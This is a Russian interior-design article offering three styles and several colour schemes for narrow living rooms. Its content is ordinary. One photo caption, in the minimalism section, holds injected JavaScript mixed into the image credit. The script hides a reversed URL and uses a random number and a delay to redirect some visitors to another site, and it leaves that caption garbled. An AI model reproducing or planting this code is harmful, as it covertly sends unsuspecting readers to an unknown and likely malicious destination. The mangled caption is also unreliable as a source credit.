Добавить в закладки

Узкая гостиная – не приговор: 3 выхода из положения

В «хрущевках» и даже некоторых современных многоэтажных зданиях почему-то для главной комнаты в доме выделяются узкие помещения, с чем связаны трудности их правильного благоустройства. Но несмотря на это удлиненную форму можно обыграть правильно подобранным стилем, визуальным разграничением на зоны, выигрышной цветовой палитрой.

Узкая гостиная

Узкая гостиная. Фото: novate.ru

Оформление в стиле минимализм

Наиболее уместно применение современных дизайнерских направлений, одним из которых выступает минимализм. Монохромные цвета оставляют пространство свободным, не создают сдавливающую атмосферу. Ровные линии придают симметричности, выразительности всему помещению. Отсутствие пышного декора, лишних предметов делают комнату свободной и функциональной.

Узкая гостиная в стиле минимализм

Узкая гостиная в стиле минимализм. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toria.ru»>comfortobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toria.ru

Оформление в стиле лофт

Также можно применить стиль лофт. Идеально, если ы сможете убрать перегородку с кухней и объединить два пространства в одно целое. Это не только добавит свободной площади, но наполнит помещения воздухом. Отделка потолка белым цветом визуально «поднимет» стены. Зонирование, осуществленное с помощью мебели, избавит от необходимости устанавливать какие-либо перегородки. Индустриальные элементы, вроде кирпичной кладки, неотесанной штукатурки, открытых труб, зададут нужную дизайнерскую ноту.

Узкая гостиная в стиле лофт

Узкая гостиная в стиле лофт. Фото: ratatum.com

Оформление в скандинавском стиле

Изобилие белого цвета в скандинавском стиле точно расширит помещение и добавит больше света. Яркие аксессуары разбавит белые стены, а правильное освещение сделает обстановку еще легче.

Узкая гостиная в скандинавском стиле

Узкая гостиная в скандинавском стиле. Фото: vfmiit.ru

Лучшие цветовые сочетания

Грамотно подобранные цвета откорректируют размерные недостатки. Длинные стены стоит обрабатывать покрытиями светлого оттенка, а для коротких подбирать насыщенные глубокие тона.

Классическое сочетание белого и черного – отличный вариант для таких типов гостиных, так как подойдет для любого интерьерного стиля.

Черно-белые цвета в интерьере узкой гостиной

Черно-белые цвета в интерьере узкой гостиной. Фото: dizajninfo.ru

Теплый беж сделает интерьер мягким и нежным, а для объединенных гостиных с кухнями подходят молочные, кофейные расслабляющие оттенки.

Узкая гостиная-кухня в теплых оттенках

Узкая гостиная-кухня в теплых оттенках. Фото: dizajninfo.ru

В комнатах с недостачей дневного света хорошо вписываются холодные тона голубого, серого и снежно-белого цвета с добавлением теплых бежевых или древесных фрагментов.

Узкая гостиная в холодных оттенках

Узкая гостиная в холодных оттенках. Фото: desmyhome.ru

Монохромные цвета удачно комбинируются с изящными розовыми, красными, зелеными или синими вкраплениями.

Узкая гостиная с розовыми акцентами

Узкая гостиная с розовыми акцентами. Фото: trizio.ru

Минимум мебели и простые цвета сделают узкое пространство гармоничным.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 20.06.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: